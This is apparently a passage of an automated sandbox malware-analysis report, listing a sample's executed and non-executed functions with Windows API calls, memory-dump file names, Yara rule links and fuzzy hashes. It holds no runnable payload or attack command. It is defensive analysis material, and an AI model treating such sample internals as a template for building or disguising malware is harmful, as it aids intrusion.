                                        Function 00407470 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 602 407470-4074b6 HeapCreate RtlAllocateHeap
                                        APIs
                                        • HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                        • RtlAllocateHeap.NTDLL(00A30000,00000001,00004104), ref: 004074AA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$AllocateCreate
                                        • String ID:
                                        • API String ID: 2875408731-0
                                        • Opcode ID: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                        • Instruction ID: edee8b013b50a9eb835c02f3e92a01e020b9c77627f8564c048df27c577a0994
                                        • Opcode Fuzzy Hash: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                        • Instruction Fuzzy Hash: 25E0B670144304AFE314CF50EF05F563BA8F304744F100429FA48AA3AAC7F264508B9E
                                        Function 00403694 Relevance: 3.0, APIs: 2, Instructions: 4COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 603 403694-4036a1 6F551CD0 CoInitialize
                                        APIs
                                        • 6F551CD0.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                        • CoInitialize.OLE32(00000000), ref: 0040369B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: F551Initialize
                                        • String ID:
                                        • API String ID: 1663224656-0
                                        • Opcode ID: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                        • Instruction ID: e54652b8d3c1eea1b95337253ed1730e4f0a5e5d42e685e6d2013b240332fa4d
                                        • Opcode Fuzzy Hash: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                        • Instruction Fuzzy Hash: 19A0023194924056DD4077729A0BB0D3570678174AF1044E9B105751D24974982285AB
                                        Function 00401BDD Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(02460000,00000008,00000000), ref: 00403DD1
                                          • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                          • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                          • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                          • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                          • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                        • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000,00000000,00000000), ref: 00401C17
                                          • Part of subcall function 00403E50: memcpy.MSVCRT(00000000,00000000,00000000,00000000,004013B3,?,?,00000000,00401C2C,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00403E83
                                          • Part of subcall function 00403E30: HeapFree.KERNEL32(02460000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                          • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                          • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                          • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                          • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C62,00000000,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                          • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                        • String ID:
                                        • API String ID: 4243183096-0
                                        • Opcode ID: e56fc6d042597ed60c71002540d3f59920f66fb00b94b04854ac603c610c8ac9
                                        • Instruction ID: 2dff8fe517095d79ad9ad3ab911cbcc41af86ea3352296ed8cd7210842124807
                                        • Opcode Fuzzy Hash: e56fc6d042597ed60c71002540d3f59920f66fb00b94b04854ac603c610c8ac9
                                        • Instruction Fuzzy Hash: 823143701182009FD300FF65ED92E6B7BA9EB48305F10883EF581B61A7C73DA9519B9E
                                        Function 00407750 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                        • Instruction ID: 28936eabe9b6fdea5660807dec5754b311fbf5a963c992916f66545fa0493ef0
                                        • Opcode Fuzzy Hash: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                        • Instruction Fuzzy Hash: F301C975900208EFC708CF58EE95A597BB4FB88308B108179ED09A7356D730AA60CB9E
                                        Function 004030A0 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                        • Instruction ID: 460cff1aebd5c89f6a466e3c7b53c8f2e2deecb765fd07c7d01cf3f68e72b86a
                                        • Opcode Fuzzy Hash: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                        • Instruction Fuzzy Hash: 91F0BCB1604701AFC308CF05C940A0BFBE6EFC8311F15C96AE4989B36AE775D842CB91
                                        Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                        • Instruction ID: 772ef9aa7f968d4b686b07dbd3a32be2510b3ef25a50012a320cac0da8777639
                                        • Opcode Fuzzy Hash: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                        • Instruction Fuzzy Hash: DAE0AEB6515701AFC324CF68C948C67F7F8EB88610B00C92EA89A93A00E630F840CF61
                                        Function 00406807 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                        • Instruction ID: a1970917e828b1c725cfc33b77b9c06a1eec18c1769a3480f2e18b6e12359080
                                        • Opcode Fuzzy Hash: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                        • Instruction Fuzzy Hash: FDB011B0280300ABE2200F20AE0AB003A20B300B0AF200020F300B82E0CBB020208A0E
                                        Function 00403D90 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                        • Instruction ID: eae18f8d58a2e4a3b1d5f4302a4f812a2dd08b0a1b01d317368b01850db83572
                                        • Opcode Fuzzy Hash: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                        • Instruction Fuzzy Hash: EDB0127029134056E2100F105E06B003930A304B43F100020F340792D6C7F01040450D

                                        Non-executed Functions

                                        Function 00405D3C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 60keyboardwindowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: State$Focus$ClassMessageNamePropSendstrncmp
                                        • String ID: PB_WindowID$Rich
                                        • API String ID: 2735883691-1396934994
                                        • Opcode ID: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                        • Instruction ID: 77dc2629d62e80cb4dd25d6b8617fe52c6faf744ad0dfdb0d38b69dd5d3036f9
                                        • Opcode Fuzzy Hash: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                        • Instruction Fuzzy Hash: 940125715007286AEE006BA0DD09FAB2F6CEF10744F008037B901F70D6D679A855DAA9
                                        Function 00404714 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                        • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                        • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                        • RevokeDragDrop.OLE32(?), ref: 00404782
                                        • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                        • String ID: PB_DropAccept$PB_ID
                                        • API String ID: 1182866496-3688647018
                                        • Opcode ID: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                        • Instruction ID: 8847c1e44ce66a7f40964fadd5f5e1718d5aefc3fa063d13d1fd232dc2879c57
                                        • Opcode Fuzzy Hash: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                        • Instruction Fuzzy Hash: C3118231000205BFCB02AF65DD88D6F3BB9EB867747108236F925722E1C735DC219B6A
                                        Function 00407E1A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • sprintf.MSVCRT ref: 00407E31
                                        • GetPropA.USER32(?,?), ref: 00407E40
                                        • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                        • RemovePropA.USER32(?,?), ref: 00407EA8
                                        • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                        • String ID: PB_GadgetStack_%i
                                        • API String ID: 1062891511-1190326050
                                        • Opcode ID: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                        • Instruction ID: cf438cc818e644c30d8d6d7832dcf279f56c8c30dc3acf8a1c3538aaa767c57c
                                        • Opcode Fuzzy Hash: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                        • Instruction Fuzzy Hash: 2E21397290020AFFCF119F50ED44CAA7B7AFB54344B00807AF905A6270D735AD61EB9A
                                        Function 00405B1F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004056EF: GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                          • Part of subcall function 004056EF: GetParent.USER32(?), ref: 00405746
                                        • GetPropA.USER32(?,PB_MDI_Gadget), ref: 00405B47
                                        • DefFrameProcA.USER32(?,00000000,?,?,?), ref: 00405B88
                                        • SetLastError.KERNEL32(00000000), ref: 00405B92
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Prop$ErrorFrameLastNtdllParentProcProc_Window
                                        • String ID: PB_MDI_Gadget
                                        • API String ID: 1329112550-983833826
                                        • Opcode ID: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                        • Instruction ID: ade2ebb50fd92f58ae0ad3d0689d10ea9bcfa41fb33ca2ed9d154264829cb94a
                                        • Opcode Fuzzy Hash: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                        • Instruction Fuzzy Hash: 8F111872901619AFDB209E449D88EBF7A7CEB45751F010037F915B22818778BC61DAAA
                                        Function 00403B70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(0;@,00401302,00000000), ref: 00403BAC
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID: 0;@$0;@
                                        • API String ID: 3192549508-1108649562
                                        • Opcode ID: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                        • Instruction ID: 0d807a84263d1bb0884b5e8a86140cc1ab27614e37fc76056ab1af4718f505d2
                                        • Opcode Fuzzy Hash: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                        • Instruction Fuzzy Hash: BFF0C9B4504300DBC701CF54DA6CA067BF8FB48746F00C53AE905A7261C778D910DB5E
                                        Function 00403CD7 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExA.KERNEL32(?), ref: 00403CF8
                                        • GetVersionExA.KERNEL32(?), ref: 00403D2C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 2f668e18bf534e839adff29b041a0c57d0d6119f9984ad761304b36825eead9b
                                        • Instruction ID: 64dd58ad121c3308c00289ce2c9b9cfa90ada999bc39041fec26db6c1a637471
                                        • Opcode Fuzzy Hash: 2f668e18bf534e839adff29b041a0c57d0d6119f9984ad761304b36825eead9b
                                        • Instruction Fuzzy Hash: 47117231644A0A95EF309E689845FAF7EACAF00743F140037A201B53D4E67C8B86C66F
                                        Function 0046E5E9 Relevance: 2.1, Strings: 1, Instructions: 832COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -
                                        • API String ID: 0-2547889144
                                        • Opcode ID: 88b241b76bfaf1e5bd9491961cd99152fc126292505aae8cd983aa4a9e870cbc
                                        • Instruction ID: 6ce90ec67530ff9c4a70fbf26a1c56785b858b8d4a11dc38e6bfc55cf4a1fc9d
                                        • Opcode Fuzzy Hash: 88b241b76bfaf1e5bd9491961cd99152fc126292505aae8cd983aa4a9e870cbc
                                        • Instruction Fuzzy Hash: 3E52DD75A002199BDF28EFA2D891BFE7BF5EF50304F10042BE45197291FB399A45CB4A
                                        Function 004505FD Relevance: 2.1, Strings: 1, Instructions: 816COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -
                                        • API String ID: 0-2547889144
                                        • Opcode ID: e0e540e9102fe430c7b1a7d576c2b2bd5b3c2b6aec879977d97a9a3c8256f244
                                        • Instruction ID: cbccb0392aa75edf3bb1ca3a89d11557c9d082d24ddc0b4109360b67a320a75f
                                        • Opcode Fuzzy Hash: e0e540e9102fe430c7b1a7d576c2b2bd5b3c2b6aec879977d97a9a3c8256f244
                                        • Instruction Fuzzy Hash: F352D1768002199EEF24EFA5D891BFE77B1FF60306F14001FEC5196296EB389949CB49
                                        Function 0046DCF9 Relevance: 1.9, Strings: 1, Instructions: 687COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmpDownload File
